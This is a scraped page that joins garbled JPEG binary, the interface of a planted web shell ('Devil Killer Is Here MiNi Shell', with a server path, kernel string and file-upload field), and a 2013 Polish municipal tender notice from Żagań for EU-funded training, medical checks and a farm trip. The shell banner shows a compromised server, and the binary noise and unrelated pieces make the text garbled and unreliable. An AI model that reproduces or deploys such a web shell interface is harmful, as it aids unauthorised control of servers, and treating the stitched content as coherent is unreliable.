JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130919/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130919/381590-N-2013.html

<p class="kh_header"><b>Żagań: Przeprowadzenie szkoleń  i badań lekarskich oraz  zorganizowanie wyjazdu do gospodarstwa agroturystycznego w województwie lubuskim w ramach projektu - Rozwój i upowszechnianie aktywnej integracji przez Gminny Ośrodek Pomocy Społecznej w Żaganiu</b><br>
<b>Numer ogłoszenia: 381590 - 2013; data zamieszczenia: 19.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Żaganiu , ul. Armii Krajowej 9, 68-100 Żagań, woj. lubuskie, tel. 068 3777021, faks 068 3772336.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminazagan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń  i badań lekarskich oraz  zorganizowanie wyjazdu do gospodarstwa agroturystycznego w województwie lubuskim w ramach projektu - Rozwój i upowszechnianie aktywnej integracji przez Gminny Ośrodek Pomocy Społecznej w Żaganiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: Przeprowadzenie szkoleń i badań lekarskich oraz zorganizowanie wyjazdu do gospodarstwa agroturystycznego w województwie lubuskim w ramach projektu - Rozwój i upowszechnianie aktywnej integracji przez Gminny Ośrodek Pomocy Społecznej w Żaganiu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
Zamówienie będzie realizowane w formie szkoleń, wyjazdu do gospodarstwa agroturystycznego oraz przeprowadzenia badań tematycznych, z których każdy stanowi odrębne zadnie. 

ZADANIE NR 1. Warsztaty - poradnictwo psychologiczne dla 24 uczestników (4 godziny x 1 spotkania oraz Indywidualne konsultacje z psychologiem 40 godzin) 
- Zamówienie obejmuje: 
1) zapewnienie wykwalifikowanej kadry trenerskiej,
2) zapewnienie odpowiednich warunków lokalowych - sala szkoleniowa dostosowana do potrzeb i liczby uczestników, z urządzeniami projekcyjnymi typu: projektor, ekran projekcyjny lub tablica interaktywna,
3) wyposażenie uczestników w niezbędne materiały szkoleniowe (w tym materiały piśmiennicze),
4) zapewnienie uczestnikom cateringu na czas trwania szkolenia (obiad z dwóch dań typu zupa i drugie danie , poczęstunek- ciasteczka - napoje, kawa, herbata),
5) opracowanie szczegółowego programu i harmonogramu szkolenia,
6) prowadzenie dokumentacji szkolenia (dziennik zajęć, listy obecności i in.),
7) sporządzenie dokumentacji fotograficznej szkolenia (min. 30 zdjęć na płycie CD),
8) oznakowanie miejsca szkolenia oraz wszelkich dokumentów związanych z organizacją szkolenia zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.

- Liczba uczestników, ilość godzin szkoleniowych, założenia organizacyjne.
Liczba uczestników szkolenia wynosi 24 osób. Liczba godzin dydaktycznych (4godziny/1 spotkania) 
Ilość grup szkoleniowych - 1 lub 2 grupy
Miejsce szkolenia - Żagań
40 godzin indywidualnych konsultacji z psychologiem.

> Zakres merytoryczny szkolenia.
Zakres merytoryczny szkolenia obejmuje takie zagadnienia tematyczne (minimum), jak:
- rola kobiet i mężczyzn w rodzinie ich prawa i uprawnienia

ZADANIE NR 2. Warsztaty z podnoszenia umiejętności samooceny, wiary w siebie 
> Zamówienie obejmuje: 
1) zapewnienie wykwalifikowanej kadry trenerskiej,
2) zapewnienie odpowiednich warunków lokalowych - sala szkoleniowa dostosowana do potrzeb i liczby uczestników, z urządzeniami projekcyjnymi typu: projektor, ekran projekcyjny lub tablica interaktywna,
3) wyposażenie uczestników w niezbędne materiały szkoleniowe (w tym materiały piśmiennicze)
4) zapewnienie uczestnikom cateringu na czas trwania szkolenia (obiad z dwóch dań , poczęstunek - ciasteczka- napoje, kawa, herbata),
5) opracowanie szczegółowego programu i harmonogramu szkolenia,
6) prowadzenie dokumentacji szkolenia (dziennik zajęć, listy obecności i in.),
7) sporządzenie dokumentacji fotograficznej szkolenia (min. 30 zdjęć na płycie CD),
8) oznakowanie miejsca szkolenia oraz wszelkich dokumentów związanych z organizacją szkolenia zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.

> Liczba uczestników, ilość godzin szkoleniowych, założenia organizacyjne.
Liczba uczestników szkolenia wynosi 24 osób (4 godziny x 1 spotkanie).
Ilość grup - 1 lub 2 grupy
Miejsce szkolenia - Żagań
> Zakres merytoryczny szkolenia.
- analiza własnych potrzeb i zainteresowań,
- poznanie własnych mocnych i słabych stron,
- planowanie przyszłości,
- praca nad sposobem myślenia,
- radzenie sobie ze stresem,
- motywacja do zmian.

ZADANIE NR 3. Warsztaty z zakresu aktywnego poszukiwania pracy 
> Zamówienie obejmuje: 
1) zapewnienie wykwalifikowanej kadry trenerskiej,
2) zapewnienie odpowiednich warunków lokalowych - sala szkoleniowa dostosowana do potrzeb i liczby uczestników, z urządzeniami projekcyjnymi typu: projektor, ekran projekcyjny lub tablica interaktywna,
3) wyposażenie uczestników w niezbędne materiały szkoleniowe (w tym materiały piśmiennicze),
4) zapewnienie uczestnikom cateringu na czas trwania szkolenia ( obiad z dwóch dań , poczęstunek - ciasteczka - napoje, kawa, herbata),
5) opracowanie szczegółowego programu i harmonogramu szkolenia,
6) prowadzenie dokumentacji szkolenia (dziennik zajęć, listy obecności i in.),
7) sporządzenie dokumentacji fotograficznej szkolenia (min. 30 zdjęć na płycie CD),
8) oznakowanie miejsca szkolenia oraz wszelkich dokumentów związanych z organizacją szkolenia zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.

> Liczba uczestników, ilość godzin szkoleniowych, założenia organizacyjne.
Liczba uczestników szkolenia wynosi 24 osób.
Liczba godzin dydaktycznych (4 godziny/ 1 spotkanie).
Ilość grup - 1 lub 2 grupy
Miejsce szkolenia - Żagań
> Zakres merytoryczny szkolenia.
Zakres merytoryczny szkolenia obejmuje takie zagadnienia tematyczne (minimum), jak:
- zapoznanie się z zasadami funkcjonowania rynku pracy,
- skuteczna komunikacja interpersonalna, także podczas procesu poszukiwania pracy,
- nabycie umiejętności tworzenia dokumentów aplikacyjnych.


ZADANIE NR 4. Szkolenia zawodowe i specjalistyczne - Szkolenie /obsługa kas fiskalnych/ 

Liczba uczestników, ilość godzin szkoleniowych, założenia organizacyjne.
Liczba uczestników szkolenia wynosi 4 osób.
Liczba godzin dydaktycznych ( 24 godzin teorii wraz z praktyką).
4 dni po 5 godz. dziennie
1 dzień 4 godz
Ilość grup - 1grupa
1) Zapewnienie wykwalifikowanej kadry trenerskiej
2) Miejsce szkolenia - Żagań a w razie konieczności przeprowadzenia szkolenia poza miejscowością Żagań należy zapewnić uczestnikom transport
3) wyposażenie uczestników w niezbędne materiały szkoleniowe (w tym materiały piśmiennicze),
4) zapewnienie uczestnikom cateringu na czas trwania szkolenia ( obiad z dwóch dań , poczęstunek - ciasteczka - napoje, kawa, herbata),
5) opracowanie szczegółowego programu i harmonogramu szkolenia,
6) prowadzenie dokumentacji szkolenia (dziennik zajęć, listy obecności i in.),
7) sporządzenie dokumentacji fotograficznej szkolenia (min. 30 zdjęć na płycie CD),
8) oznakowanie miejsca szkolenia oraz wszelkich dokumentów związanych z organizacją szkolenia zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.

Zakres merytoryczny szkolenia:
- Obowiązek instalacji kasy rejestrującej
- Podział kas wg Rozporządzenia Ministerstwa Finansów
- podstawowe pojęcia dotyczące urzadzeń fiskalnych, typy-rodzaje kas,
- kasy fiskalne 
- omówienie zasad programowania, sprzedaży i wykonania raportów 
- budowa kas z punktu widzenia użytkownika 
- obsługa kas - wymiana taśmy- papieru
- wprowadzanie kodów
- stornowanie , anulowanie paragonu
- serwis- zasady, czynności
- przechowywanie dokumentów
- likwidacja kas

Ukończenie szkolenia potwierdzone będzie imiennym zaświadczeniem o ukończonym kursie oraz świadectwem kwalifikacyjnym
a także każdy uczestnik szkolenia otrzyma zestaw 2 filiżanek z 2 talerzykami w pudełu ozdobnym .


ZADANIE NR 5. Szkolenia zawodowe i specjalistyczne - Szkolenie / bukieciarstwo/

Liczba uczestników, ilość godzin szkoleniowych, założenia organizacyjne.
Liczba uczestników szkolenia wynosi 10 osób.
Liczba godzin dydaktycznych 20 godzin teorii, 80 godzin praktyki
4 dni po 5 godz. dziennie
11 dni po 6 godz. dziennie
2 dni po 7 godz. dziennie
Ilość grup - 1 lub 2 grupy.
1) Zapewnienie wykwalifikowanej kadry trenerskiej
2) Miejsce szkolenia - Żagań a w razie konieczności przeprowadzenia szkolenia poza miejscowością Żagań należy zapewnić uczestnikom transport
3) wyposażenie uczestników w niezbędne materiały szkoleniowe (w tym materiały piśmiennicze),
4) zapewnienie uczestnikom cateringu na czas trwania szkolenia ( obiad z dwóch dań , poczęstunek - ciasteczka - napoje, kawa, herbata),
5) opracowanie szczegółowego programu i harmonogramu szkolenia,
6) prowadzenie dokumentacji szkolenia (dziennik zajęć, listy obecności i in.),
7) sporządzenie dokumentacji fotograficznej szkolenia (min. 30 zdjęć na płycie CD),
8) oznakowanie miejsca szkolenia oraz wszelkich dokumentów związanych z organizacją szkolenia zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.

Oferent zapewni w ramach szkolenia: niezbędny sprzęt i materiały dydaktyczne do realizacji szkolenia, materiały piśmiennicze , dekoracyjne, i florystyczne{w tym narzędzia, kwiaty sztuczne i żywe, ozdoby}
Na zakończenie szkolenia każdy uczestnik otrzyma :
- pistolet wyciskacz do kleju na gorąco[ kleji i spaja materiały metalowe i niemetalowe] moc 25/78W, napięcie znamionowe 230V, częstotliwość znamionowa 50Hz, pobór mocy w stanie roboczym 78W, podpórka do pistoletu, średnica laski kleju 11,2mm,
- laski kleju do pistoletu - zapas- 20cmx50 szt[1 kg]
- 2 kolejne numery miesięcznika poświęcone florystyce-układaniu kwiatów

Zakres merytoryczny szkolenia:
- zagadnienia teoretyczne
- teoria barw i kompozycji
- florystyczne zasady kompozycji
- kompozycje z suchego materiału
- narzędzia florystyk - materiałoznawstwo
- dekorowanie wnętrz, stołów przy użyciu kwiatów
- sztuka układania kwiatów w naczyniu 
- kompozycje żywe na imprezy okolicznościowe 

W ramach zajęć z praktyki każdy uczestnik wykona po 1 pracy z kwiatów sztucznych lub żywych i przekaże dla zamawiającego czyli do GOPS w Żaganiu, -zostanie zorganizowana wystawa wykonanych prac.

ZADANIE nr 6. Szkolenia zawodowe i specjalistyczne - Szkolenie /Malarz pokojowy/

Liczba uczestników, ilość godzin szkoleniowych, założenia organizacyjne.
Liczba uczestników szkolenia wynosi 10 osób.
Liczba godzin dydaktycznych ( 20 godzin teorii, 80 godzin praktyki)
5 dni po 6 godz. dziennie
10 dni po 7 godz. dziennie
Ilość grup - 1lub 2 grupy.
1) Zapewnienie wykwalifikowanej kadry trenerskiej
2) Miejsce szkolenia - Żagań a w razie konieczności przeprowadzenia szkolenia poza miejscowością Żagań należy zapewnić uczestnikom transport
3) wyposażenie uczestników w niezbędne materiały szkoleniowe (w tym materiały piśmiennicze),
4) zapewnienie uczestnikom cateringu na czas trwania szkolenia ( obiad z dwóch dań , poczęstunek - ciasteczka - napoje, kawa, herbata),
5) opracowanie szczegółowego programu i harmonogramu szkolenia,
6) prowadzenie dokumentacji szkolenia (dziennik zajęć, listy obecności i in.),
7) sporządzenie dokumentacji fotograficznej szkolenia (min. 30 zdjęć na płycie CD),
8) oznakowanie miejsca szkolenia oraz wszelkich dokumentów związanych z organizacją szkolenia zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.

Zakres merytoryczny szkolenia: 
- Zasady bezpieczeństwa pracy podczas robót malarskich
- Farby- podstawowe informacje , charakterystyka i podział
- Rodzaje farb
- Podstawowe parametry użytkowania
- Przygotowanie ścian{czyszczenie, szpachlowanie, gruntowanie,
- Technika dekorowania ścian
- Narzędzia do robót malarskich
- Tapetowanie
Na zakończenie szkolenia każdy uczestnik otrzyma: 
- drabinę-domową, wolnostojącą, jednostronną, aluminiową, 4-stopniową,
- pistolet malarski [w zestawie: jednostka główna, wężyk, pasek do noszenia, naparstek do pomiaru lepkości, pistolet malarski, pojemnik na farbę, spinka do czyszczenia,}dane techniczne: napięcie 230V-240V, 50 Hz, moc 650W, moc rozpylacza 105W, poj. pojemnika 800ml, prędkość obrotowa silnika [obr/min] 32 000, długość węża 1,5m,
maksymalna lepkość 130DIN-Sec,
- poziomica budowlana - aluminiowa,3 libelki, długość 1500mm
- kuweta malarska wraz z wałkiem do malowania[długość wałka 20cm]
Ukończenie warsztatów potwierdzone będzie imiennym zaświadczeniem oraz świadectwem kwalifikacyjnym 


Uczestnicy kursu w ramach praktyk przygotują ściany do pomalowania i je pomalują - pomieszczenia    wskazane przez GOPS w Żaganiu w ilości 3 pokoi po ok. 20 m2-każdy.


ZADANIE nr 7. Wyjazd do gospodarstwa agroturystycznego w województwie lubuskim - mający na celu zapoznanie się ze zdrowym stylem życia oraz zdrowym sposobem żywienia.

1) Wyjazd dwudniowy z dwoma noclegami dla 10 osób do gospodarstwa agroturystycznego w rejonie województwa lubuskiego
- nocleg w pokojach dwuosobowych z łazienkami, z tv
- pełne wyżywienie( śniadanie, obiad dwu daniowy typu zupa, drugie danie oraz deser, kolacja w tym jedna kolacja uroczysta(przystawki, lekka zupa, danie główne, sałatki lekkie i zdrowe, zimna płyta, napoje)-druga kolacja jako biesiadowanie przy grilu )
- transport osób, parkingi, opłaty drogowe, 
- ubezpieczenie NW w czasie podróży i pobytu
- obsługa pilota, opiekun grupy
2) opracowanie harmonogramu wyjazdu
W trakcie pobytu: 

> Spotkanie - wykład dietetyka na temat zdrowego żywienia, (np. co zawiera najwięcej tłuszczy), zdrowego stylu życia, poprawy zdrowia i kondycji fizycznej, regeneracja oraz odnowienie energii życia i ogólnej wiedzy a także pomiar tkanki tłuszczowej każdemu uczestnikowi i indywidualne dopasowanie diety.
1,5 godz. - wykład
3 godz. - indywidualne konsultacje poszczególnych uczestników. 
Uczestnik otrzyma ulotki o zdrowym żywieniu oraz książka w twardej oprawie dot. zdrowego żywienia

- Podczas pobytu wykonawca zobowiąże się do zorganizowania warsztatów kulinarnych dwóch do wyboru z czterech-wędzenie, produkcja masła, produkcja mąki, wspólne pieczenie chleba,

- przejażdzka bryczką ok. 1 godziny lub masaż profesjonalny - relaksujący 30 minutowy/1 uczestnik

- każdy uczestnik otrzyma kije do nordic walking i zostaną przeprowadzone zajęcia z instruktorem wprowadzajace do tej czynności wraz ze spacerem po trasach nordic walking,(trasa nie mniej niż 2,5 godz)
Zakres merytoryczny 
Jak powinien wyglądać prawidłowy i ciekawy trening, zakres techniki chodzenia z kijkami i metodyki 
 Materiały opisujące N/W
 Praktyczna nauka ćwiczeń przygotowujących do zajęć(rozgrzewka, rozciąganie)
Doskonalenie z instruktorem
Dane techniczne kijków:
-profesjonalne kije do N/W z teleskopem, systemem ANTISHOCK, zestaw końcówek, wszystko w torbie na kije wraz z krokomierzem
kije wyposażone w 3 segmentowy mechanizm teleskopowy ANTISHOCK(możliwość wyłączenia i włączenia), długość od 64-135cm, odporne na działania zewnętrzne- aluminium, rękojeści wyprofilowane i wbudowane w nie kompas, wymienne końcówki, waga kompletu 0,60 kg

A także 
> pamiątki i gadżety związane z rejonem :
m in. album o danym rejonie 

3) prowadzenie dokumentacji z wjazdu,
4) sporządzenie dokumentacji fotograficznej (min. po 30 zdjęć na płycie CD),
oznakowanie wszelkich dokumentów związanych z organizacją wyjazdu zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.


ZADANIE nr 8. Aktywizacja zdrowotna osób biorących udział w szkoleniach 
 Zamówienie obejmuje: 
1) zapewnienie wykwalifikowanej obsługi medycznej
2) zapewnienie uczestnikom transportu w razie konieczności przeprowadzenia badań poza miejscowością Żagań
3) opracowanie harmonogramu badań,
4) prowadzenie dokumentacji z badań (listy obecności, listy wydania wyników badań i in.),
5) sporządzenie dokumentacji fotograficznej badań (min. po 10 zdjęć na płycie CD),
6) oznakowanie wszelkich dokumentów związanych z organizacją badań zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.

> Liczba uczestników, założenia organizacyjne.
Liczba uczestników badań wynosi 24 osób.
Miejsce badań - Żagań a w razie konieczności przeprowadzenia badań poza miejscowością Żagań należy zapewnić uczestnikom transport.
> Zakres badań: 
- skierowanie i wykonanie na badania profilaktyczne lub specjalistyczne w związku z możliwością podjęcia zatrudnienia dla 24 uczestników projektu: 
- 10 osób odbywających szkolenie /malarza pokojowego/
- 10 osób odbywających szkolenie /bukieciarstwa/
- 4 osób odbywających szkolenie/ obsługi kas fiskalnych/..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.51.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostaje spełniony jeżeli Wykonawca przedstawi wpis do właściwego rejestru instytucji szkoleniowych.
Zamawiający oceni spełnienie powyższego warunku na podstawie złożonych dokumentów zgodnie z formułą -spełnia/nie spełnia/.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykonał, a w przypadku świadczeń  okresowych lub ciągłych również wykonuje usługi w zakresie niezbędnym do wykazania spełnienia warunków wiedzy i doświadczenia w okresie ostatnich trzech lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej trzy szkolenia przeprowadzone w ramach realizacji projektów współfinansowanych ze środków EFS o wartości nie mniejszej niż 70.000 zł łącznie
Zamawiający oceni spełnienie powyższego warunku na podstawie złożonych dokumentów zgodnie z formułą - spełnia/nie spełnia/.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie  precyzuje szczegółowego warunku w tym zakresie. Zamawiający dokona oceny na podstawie złożonego przez Wykonawcę oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykaże, że osoba/osoby prowadzące posiadają wiedzę i doświadczenie w prowadzeniu szkoleń z zakresu objętego niniejszym zamówieniem;
Zamawiający oceni spełnienie powyższego warunku na podstawie złożonych dokumentów zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego warunku w tym zakresie. Zamawiający dokona oceny na podstawie złożonego przez Wykonawcę oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
